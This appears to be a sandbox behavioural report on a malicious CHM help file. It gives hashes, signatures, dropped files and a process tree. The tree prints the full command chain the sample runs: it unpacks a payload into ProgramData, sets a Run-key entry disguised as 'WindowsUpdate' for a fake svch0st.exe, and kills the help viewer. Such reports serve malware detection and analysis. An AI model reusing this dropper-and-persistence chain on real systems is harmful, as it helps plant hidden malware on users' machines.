Analysis
max time kernel: 131s
max time network: 146s
platform: windows10-2004_x64
resource: win10v2004-20230220-en
resource tags: arch:x64, arch:x86, image:win10v2004-20230220-en, locale:en-us, os:windows10-2004-x64, system
submitted: 16-03-2023 03:22
Static task: static1
Behavioral task behavioral1: Sample virus/meitu.chm, Resource win7-20230220-en
Behavioral task behavioral2: Sample virus/meitu.chm, Resource win10v2004-20230220-en
Behavioral task behavioral3: Sample virus/白加黑衍生物/UpgradeShow.dll, Resource win7-20230220-en
Behavioral task behavioral4: Sample virus/白加黑衍生物/UpgradeShow.dll, Resource win10v2004-20230220-en
Behavioral task behavioral5: Sample virus/白加黑衍生物/svch0st.exe, Resource win7-20230220-en
Behavioral task behavioral6: Sample virus/白加黑衍生物/svch0st.exe, Resource win10v2004-20230220-en
(The directory name 白加黑衍生物 translates to "white-plus-black derivatives"; 白加黑 is the Chinese term for side-loading a malicious DLL through a signed, legitimate EXE. The rest of this page is the behavioral2 report: virus/meitu.chm run on win10v2004-20230220-en.)
General
Target: virus/meitu.chm
Size: 1.2MB
MD5: 3dbfbb912f430ae62df647a767a86884
SHA1: 0604930ef6eef2e10ae38e9b89d819ecda25f847
SHA256: 8ffcc91dcb5657a9e8012bdc8b3b73bf541161f7c619e824fd5c5ae4b9b129f1
SHA512: 984f57541f443b36b991df5a2bbb4f55760a9a08f0b49d3fb9908c6bcc0a7fa6eb16cb3c2fbb659e700836af35eef942c007ab60c4bb09972d6a34968dc1e38d
SSDEEP: 24576:i7cuHGvz89BSOMfdLDCb1IlosIfHvzceiw3L3DYxROi2nmbvkIOMaNC:i7cuG89BSOALDs7sIPvzceiwb3DYv5bl
Malware Config
Signatures
Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
Processes:
  Key value queried: \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation (cmd.exe)

Executes dropped EXE (2 IoCs)
Processes:
  PID 732 system_wiNuirements.mht
  PID 4312 svch0st.exe

Adds Run key to start application (2 TTPs, 2 IoCs)
Processes:
  Key created: \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run (reg.exe)
  Set value (str): \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate = "\"C:\\ProgramData\\echelp\\svch0st.exe\"" (reg.exe)

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour. (This is the sandbox's generic description for the signature; no IoCs are recorded for it in this report, and nothing else in the report supports a ransomware classification.)

Gathers network information (2 TTPs, 2 IoCs)
Uses commandline utility to view network configuration.
Processes:
  PID 1668 ipconfig.exe
  PID 3864 ipconfig.exe

Kills process with taskkill (1 IoC)
Processes:
  PID 3656 taskkill.exe

Modifies registry key (1 TTP, 1 IoC)

Runs ping.exe (1 TTP, 3 IoCs)
Processes:
  PID 2556 PING.EXE
  PID 628 PING.EXE
  PID 4260 PING.EXE

Suspicious use of AdjustPrivilegeToken (1 IoC)
Processes:
  Token: SeDebugPrivilege, PID 3656 taskkill.exe

Suspicious use of SetWindowsHookEx (3 IoCs)
Processes:
  PID 3568 hh.exe
  PID 3568 hh.exe
  PID 520 conhost.exe

Suspicious use of WriteProcessMemory (27 IoCs)
Processes (source PID/process -> target PID/process; the report lists each event the number of times shown):
  3568 hh.exe -> 520 conhost.exe (x2)
  520 conhost.exe -> 448 cmd.exe (x2)
  448 cmd.exe -> 2588 hh.exe (x2)
  448 cmd.exe -> 628 PING.EXE (x2)
  448 cmd.exe -> 864 cmd.exe (x2)
  864 cmd.exe -> 732 system_wiNuirements.mht (x3)
  448 cmd.exe -> 4260 PING.EXE (x2)
  448 cmd.exe -> 1668 ipconfig.exe (x2)
  448 cmd.exe -> 1728 cmd.exe (x2)
  1728 cmd.exe -> 1632 reg.exe (x2)
  448 cmd.exe -> 2556 PING.EXE (x2)
  448 cmd.exe -> 3864 ipconfig.exe (x2)
  448 cmd.exe -> 3656 taskkill.exe (x2)
Processes (indentation shows the parent/child depth from the report)
C:\Windows\hh.exe
  "C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\virus\meitu.chm
  PID 3568; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
  C:\Windows\System32\conhost.exe
    "C:\Windows\System32\conhost.exe" cmd /C hh -decompile C:\ProgramData\echelp ./meitu.chm&ping 127.0.0.1 -n 1 >nul&cmd /C C:\ProgramData\echelp\system_wiNuirements.mht x C:\ProgramData\echelp\introducziPn.mht -O- C:\ProgramData\echelp\&ping 127.0.0.1 -n 1 >nul&start C:\ProgramData\echelp\duankai.lnk&cmd /C reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v WindowsUpdate /t REG_SZ /d \"C:\ProgramData\echelp\svch0st.exe\" /f&ping 127.0.0.1 -n 1 >nul&start C:\ProgramData\echelp\svch0st.exe&start C:\ProgramData\echelp\ipconfig.lnk&taskkill /f /t /im hh.exe"
    PID 520; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
    C:\Windows\System32\cmd.exe
      cmd /C hh -decompile C:\ProgramData\echelp ./meitu.chm&ping 127.0.0.1 -n 1 >nul&cmd /C C:\ProgramData\echelp\system_wiNuirements.mht x C:\ProgramData\echelp\introducziPn.mht -O- C:\ProgramData\echelp\&ping 127.0.0.1 -n 1 >nul&start C:\ProgramData\echelp\duankai.lnk&cmd /C reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v WindowsUpdate /t REG_SZ /d \"C:\ProgramData\echelp\svch0st.exe\" /f&ping 127.0.0.1 -n 1 >nul&start C:\ProgramData\echelp\svch0st.exe&start C:\ProgramData\echelp\ipconfig.lnk&taskkill /f /t /im hh.exe
      PID 448; Checks computer location settings; Suspicious use of WriteProcessMemory
      C:\Windows\hh.exe
        hh -decompile C:\ProgramData\echelp ./meitu.chm
        PID 2588
      C:\Windows\system32\PING.EXE
        ping 127.0.0.1 -n 1
        PID 628; Runs ping.exe
      C:\Windows\system32\cmd.exe
        cmd /C C:\ProgramData\echelp\system_wiNuirements.mht x C:\ProgramData\echelp\introducziPn.mht -O- C:\ProgramData\echelp\
        PID 864; Suspicious use of WriteProcessMemory
        C:\ProgramData\echelp\system_wiNuirements.mht
          C:\ProgramData\echelp\system_wiNuirements.mht x C:\ProgramData\echelp\introducziPn.mht -O- C:\ProgramData\echelp\
          PID 732; Executes dropped EXE
      C:\Windows\system32\PING.EXE
        ping 127.0.0.1 -n 1
        PID 4260; Runs ping.exe
      C:\Windows\System32\ipconfig.exe
        "C:\Windows\System32\ipconfig.exe" /release
        PID 1668; Gathers network information
      C:\Windows\system32\cmd.exe
        cmd /C reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v WindowsUpdate /t REG_SZ /d \"C:\ProgramData\echelp\svch0st.exe\" /f
        PID 1728; Suspicious use of WriteProcessMemory
        C:\Windows\system32\reg.exe
          reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v WindowsUpdate /t REG_SZ /d \"C:\ProgramData\echelp\svch0st.exe\" /f
          PID 1632; Adds Run key to start application; Modifies registry key
      C:\Windows\system32\PING.EXE
        ping 127.0.0.1 -n 1
        PID 2556; Runs ping.exe
      C:\ProgramData\echelp\svch0st.exe
        C:\ProgramData\echelp\svch0st.exe
        PID 4312; Executes dropped EXE
      C:\Windows\System32\ipconfig.exe
        "C:\Windows\System32\ipconfig.exe" /renew
        PID 3864; Gathers network information
      C:\Windows\system32\taskkill.exe
        taskkill /f /t /im hh.exe
        PID 3656; Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v6
Downloads
C:\ProgramData\echelp\duankai.lnk
  Filesize: 1KB
  MD5: 494737c8bba58f091393c67d1a03f6c5
  SHA1: 2dadf68af7cef6a71638abdcf9002244b8234b46
  SHA256: ce4d3b1be35448fedade51dfe257d5e416209dfa3602dbab194933c33a29459f
  SHA512: 60e09087de9b04153e88e3ea9d08f9860189f6475fbf8a20f3bc153586f02d9a20da88327e53d10be3af86700abc63eca74f7b25e3282aefdf3e2bd72e1d17e4
C:\ProgramData\echelp\introducziPn.mht
  Filesize: 891KB
  MD5: 0bad47cb97f01d24fdbefe3905d92d14
  SHA1: 75304034da42d22101a9680dc210ad76477d48bb
  SHA256: 621d858908e53288bac2581c51c6a401300d6e66365a21310d865ee392da0670
  SHA512: 37c54f4466c386f379c0ab10f7ca918ef019be41d2c5b45c2c02eaf59f41692d14f3600b08a2b5f05ed5994c397787b441526f73eded9e0300a7165e3af1b256
C:\ProgramData\echelp\ipconfig.lnk
  Filesize: 1KB
  MD5: 85816dff477434c9eee3dfb7f5adec3d
  SHA1: f74a01d32eab8b975fef93802fecfe764a60dbb6
  SHA256: 960935b125cb86149b7c5399a050ecc6ce91164a156662cd181319c479c54212
  SHA512: 059aa8fd552c86c7504a93fda065cef5d1fdb93514ae99d459b517a2c5554c33d9c32d5b3f91a4adaba54185171cd4238e5813dd4568bed143097f4523e8759f
C:\ProgramData\echelp\svch0st.exe
  Filesize: 985KB
  MD5: 9606b727e58cb0157e1586adac252462
  SHA1: 9bbb77aea71b44f0f7737ed47bae3fa67df6c8d4
  SHA256: 8fcbe954783759e96a9cc1cf6aa2cb16d6c95a8f0a0c661ee0c1e241079c6de2
  SHA512: 1d07695b0d597703336d0d0a50353712c83ba5354de006a7a444dd270253ce5a4e362cb98e83acfedabe325f29e3da51946cc3625bb8f452cf212cdccc9eba1f
C:\ProgramData\echelp\system_wiNuirements.mht
  Filesize: 587KB
  MD5: b5f45160976bb7ebac87b62ea1e6abcd
  SHA1: 0d08f13587ba55ca7792bf45ef2cc3d9925e411f
  SHA256: 2f32d221f332feb1530896849a5345b9dba7a64b6c432b99b2846bfaa316044c
  SHA512: a0afc0ef35980157623b6390304a8427f9932ca8492fdc251cbb2802fb70e82b74b8c774d4df2f9b9968e970181dc2e382979e11d8b90d632a83ba6cea5c411a
memory/732-168-0x0000000000400000-0x0000000000507000-memory.dmp
  Filesize: 1.0MB